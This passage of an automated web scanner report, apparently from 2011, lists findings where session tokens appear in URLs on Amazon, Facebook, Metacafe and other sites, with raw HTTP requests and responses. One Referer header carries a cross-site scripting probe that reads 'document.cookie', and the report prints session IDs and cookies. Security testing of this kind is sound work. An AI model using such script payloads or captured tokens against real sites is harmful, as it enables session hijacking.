<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R1Y1OWU5QLKEDW/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3E90852F7C987E7C7C3E29BC2509EEF654E678BB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDU5NjgwNDk0Ni9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2V2ZXJkaWEtMjAmbGlua0NvZGU9YXMyJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlPTM5MDk1NyZjcmVhdGl2ZUFTSU49MDU5NjgwNDk0Ng&voteAnchorName=R1Y1OWU5QLKEDW.2115.Inappropriate.Reviews&voteSessionID=177-3345764-3077262"
>
Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-3345764-3077262?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.76. http://www.amazon.com/gp/site-directory/x22

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /gp/site-directory/x22

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601
  • http://www.amazon.com/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C
  • http://www.amazon.com/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwebstore.amazon.com%2F%3Fld%3DAZNav&token=745025A57E00B24318BA2181B3B753FC6B2F166D
  • http://www.amazon.com/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2FproductAds%2Findex.html%3Fld%3DAZPadsNav&token=1E60AB4AC0ECCA00151B45353E21782E539DC601
  • http://www.amazon.com/gp/redirect.html/ref=sd_allcat_adv/192-0833084-3663062?location=http://advantage.amazon.com/gp/vendor/public/join&token=8A42249D1B51779DE51C03226E939CB7EF5FF354
  • http://www.amazon.com/gp/redirect.html/ref=sd_allcat_dtp/192-0833084-3663062?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
  • https://www.amazon.com/gp/redirect.html/ref=sd_allcat_amzpmtdls/192-0833084-3663062?_encoding=UTF8&location=https%3A%2F%2Fpayments.amazon.com%2Fsdui%2Fsdui%2Fpersonal%2Fdeals%3Fapaysccid%3Damzn-allstores&token=32045C225BB802284AADB840CB3223F0668A29BF

Request

GET /gp/site-directory/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 040X2S941YQ8YM9GDF3Y
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: sl07PFCJKDLvXHwNIxyGk0Yh+o6P2TnOLpehS7jphg0PPwo4AItme2BkehKpR0Nz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-0833084-3663062; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 106589


<html>
<head>


<style type="text/css"><!--


BODY { font-family: verdana,arial,helvetica,sans-serif; font-size: x-small; background-color: #FFFFFF; color: #000000; margin-
...[SNIP]...
</a>, <a href="https://www.amazon.com:443/gp/redirect.html/ref=sd_allcat_amzpmtdls/192-0833084-3663062?_encoding=UTF8&amp;location=https%3A%2F%2Fpayments.amazon.com%2Fsdui%2Fsdui%2Fpersonal%2Fdeals%3Fapaysccid%3Damzn-allstores&amp;token=32045C225BB802284AADB840CB3223F0668A29BF">Amazon Payments Deals</a>
...[SNIP]...
</span>
<a href="/gp/redirect.html/ref=sd_allcat_adv/192-0833084-3663062?location=http://advantage.amazon.com/gp/vendor/public/join&amp;token=8A42249D1B51779DE51C03226E939CB7EF5FF354">Advantage</a>
...[SNIP]...
</a>, <a href="/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&amp;location=http%3A%2F%2Fwebstore.amazon.com%2F%3Fld%3DAZNav&amp;token=745025A57E00B24318BA2181B3B753FC6B2F166D">WebStore by Amazon</a>, <a href="/gp/redirect.html/ref=sd_allcat_dtp/192-0833084-3663062?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Digital Text Platform</a>, <a href="/gp/redirect.html/ref=sd_allcat/192-0833084-3663062?_encoding=UTF8&amp;location=http%3A%2F%2Fwww.amazonservices.com%2FproductAds%2Findex.html%3Fld%3DAZPadsNav&amp;token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Product Ads</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/192-0833084-3663062?_encoding=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601">Advertise Your Products</a>
...[SNIP]...

9.77. http://www.apture.com/js/apture.js

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:
  • http://www.apture.com/js/apture.js?siteToken=5rLcDWk

Request

GET /js/apture.js?siteToken=5rLcDWk HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 24 Jan 2011 21:11:11 GMT
Last-Modified: Mon, 24 Jan 2011 21:11:11 GMT
Etag: "4ad7d91e6131ca80d32f15ef4593339c"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=nbrlsqWMpk; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 1604
Date: Mon, 24 Jan 2011 21:11:11 GMT
Connection: close


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5
...[SNIP]...

9.78. http://www.dzone.com/links/add.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.dzone.com
Path:   /links/add.html

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s

Request

GET /links/add.html?url={u}&title={t} HTTP/1.1
Host: www.dzone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 13:14:07 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: private, max-age=1
Location: http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s
Content-Length: 108
Set-Cookie: JSESSIONID=aaaH3fDCwPO6Ah760t92s; path=/
Content-Type: text/html; charset=utf-8
Expires: Tue, 25 Jan 2011 13:14:08 GMT
Vary: Accept-Encoding,User-Agent
Connection: close

The URL has moved <a href="http://www.dzone.com/links/login.html;jsessionid=aaaH3fDCwPO6Ah760t92s">here</a>

9.79. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:
  • http://www.facebook.com/extern/login_status.php?api_key=131775306867765&app_id=131775306867765&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3ee735f9c%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df41cbdf34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39e2b2a64%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df28381e04%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1f9f09a34%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=131775306867765&app_id=131775306867765&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df3ee735f9c%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dopener%26transport%3Dpostmessage%26frame%3Df41cbdf34%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df39e2b2a64%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df28381e04%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23cb%3Df1f9f09a34%26origin%3Dhttp%253A%252F%252Fcommunity.joomla.org%252Ff3e449cbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df41cbdf34&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://community.joomla.org/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dla2day.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.la2day.com%252F%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php#cb=f28381e04&origin=http%3A%2F%2Fcommunity.joomla.org%2Ff3e449cbc&relation=parent&transport=postmessage&frame=f41cbdf34
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 24 Jan 2011 02:20:43 GMT
Content-Length: 0


9.80. http://www.metacafe.com/fplayer/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The response contains the following links that appear to contain session tokens:
  • https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c
  • https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=login
  • https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&action=register

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<li class="Account" id="Register"><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&amp;action=register" rel="nofollow" title="Register">Register</a>
...[SNIP]...
<li class="Account" id="SignIn"><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&amp;action=login" rel="nofollow" title="Sign In">Sign In</a>
...[SNIP]...
<li class="report" id="Submit"><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c&amp;action=login" title="" tabindex="7">Upload</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c" title="Your Channel">My Channel</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c" title="Subscriptions">Subscriptions</a>
...[SNIP]...
<li><a href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c" title="Favorites">Favorites</a>
...[SNIP]...
<li><a id="CountryFlag" href="https://secure.metacafe.com/account/login/?token=bfa4589eaa47094016e477c9239ce87c">Location: <img src="http://s.mcstatic.com/Images/flags/us.gif" alt="US" />
...[SNIP]...

9.81. http://www.mindbodygreen.com/passvote.action

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.mindbodygreen.com
Path:   /passvote.action

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /passvote.action HTTP/1.1
Host: www.mindbodygreen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Date: Tue, 25 Jan 2011 04:45:36 GMT
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
</title>
<link rel="alternate" type="application/rss+xml" title="MindBodyGreen - Mind/Body Wellness and Green Living Tips, News, and Interviews" href="/rss/feed.xml;jsessionid=411392370C2802E8CD928A39CCA58AA0" />
<link rel="stylesheet" type="text/css" href="/css/main.css;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<link rel="stylesheet" type="text/css" href="/css/featurepreviews.css;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<link rel="stylesheet" type="text/css" href="/css/wc.css;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<link rel="stylesheet" type="text/css" href="http://www.facebook.com/css/connect/connect_button.css" />
<link rel="Shortcut Icon" href="/favicon.ico;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<script src="http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1" type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="/js/swfobject.js;jsessionid=411392370C2802E8CD928A39CCA58AA0"></script>
...[SNIP]...
<div id="logo-top">
           <a href="/;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/logo_symbols.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
       </div>
       <div id="logo-bottom">
           <a href="/;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/logo_text.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
       </div>
       <div id="leader">
           <img src="/images/tagline.png;jsessionid=411392370C2802E8CD928A39CCA58AA0" alt="Your Gateway to Wellness: Better, Healthier, Greener Living">
       </div>
...[SNIP]...
<div class="link" style="width:120px"><a href="/Personal-Growth/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Personal Growth</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:90px"><a href="/Spirituality/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Spirituality</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:110px"><a href="/Yoga-Pilates/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Yoga &amp; Pilates</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:50px"><a href="/Food/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Food</a></div>
           <div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:64px"><a href="/Fitness/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Fitness</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:74px"><a href="/Wellness/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Wellness</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:54px"><a href="/Home/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Home</a></div>
           <div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:64px"><a href="/Culture/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Culture</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div><div class="link" style="width:80px"><a href="/QandA;jsessionid=411392370C2802E8CD928A39CCA58AA0">Interviews</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div><div class="link" style="width:130px"><a href="/Beginners-Guides;jsessionid=411392370C2802E8CD928A39CCA58AA0">Beginners Guides</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div><div class="link" style="width:78px"><a href="/tag/video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Videos</a>
...[SNIP]...
<a href="http://travel.mindbodygreen.com"><img src="/images/travel-banner-300x250.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
...[SNIP]...
<a href="http://www.youtube.com/user/MindBodyGreen" target="_blank"><img src="/images/youtube-logo.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" style="height:49px"></img></a>
<a href="http://itunes.apple.com/us/podcast/mindbodygreen/id367278016" target="_blank"><img src="/images/itunes-logo.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" style="width:140px"></img>
...[SNIP]...
</div>
   <a href="/wc/tara-stiles;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/stiles-tara-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/dr-frank-lipman;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/lipman-frank-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/kathryn-budig;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/budig-kathryn-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/tony-gonzalez;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/gonzalez-tony-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/gabby-reece;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/reece-gabby-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/brian-johnson;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/johnson-brian-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/hillary-biscay;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/biscay-hillary-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/brendan-brazier;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/brazier-brendan-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/jess-ainscough;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/ainscough-jess-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/dana-claudat;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/claudat-dana-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/michael-taylor;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/taylor-michael-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/david-romanelli;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/romanelli-dave-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/jayme-barrett;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/barrett-jayme-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/jason-wachob;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/wachob-jason-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
<div style="float:left;width:145px;padding:0 2px 0 2px">


<a href="/tag/abs.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">abs (24)</a><br/>


<a href="/tag/alice-waters.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">alice waters (10)</a><br/>


<a href="/tag/alicia-silverstone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">alicia silverstone (10)</a><br/>


<a href="/tag/apps.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">apps (11)</a><br/>


<a href="/tag/beauty.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">beauty (72)</a><br/>


<a href="/tag/beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">beginners (84)</a><br/>


<a href="/tag/books.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">books (97)</a><br/>


<a href="/tag/celebrity.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">celebrity (327)</a><br/>


<a href="/tag/chefs.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">chefs (57)</a><br/>


<a href="/tag/chicago.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">chicago (6)</a><br/>


<a href="/tag/cleanse.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">cleanse (18)</a><br/>


<a href="/tag/culture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">culture (314)</a><br/>


